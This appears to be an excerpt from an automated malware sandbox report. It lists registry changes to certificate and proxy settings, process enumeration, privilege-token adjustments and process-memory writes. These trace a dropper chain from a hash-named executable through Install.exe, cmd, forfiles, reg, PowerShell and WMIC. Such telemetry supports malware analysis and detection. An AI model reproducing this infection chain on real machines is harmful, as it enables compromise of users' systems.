Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-c5-cc-b4-62-fb\WpadDetectedUrl C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{E37A4A68-9935-456D-A74E-22D5AFBB3917}\WpadDecisionTime = d0f3184eeabdda01 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000001077cf1feabdda01 C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{E37A4A68-9935-456D-A74E-22D5AFBB3917}\a6-c5-cc-b4-62-fb C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-c5-cc-b4-62-fb\WpadDecision = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f010b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f07e1420eabdda01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2864 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe
PID 2864 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe
PID 2864 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe
PID 2864 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe
PID 2864 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe
PID 2864 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe
PID 2864 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe
PID 292 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
PID 292 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
PID 292 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
PID 292 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
PID 292 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
PID 292 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
PID 292 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
PID 2532 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2660 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2592 wrote to memory of 2552 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2552 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2552 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2552 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2552 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2552 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2552 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2552 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2552 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2552 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2552 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2552 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2552 wrote to memory of 2876 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2660 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2660 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
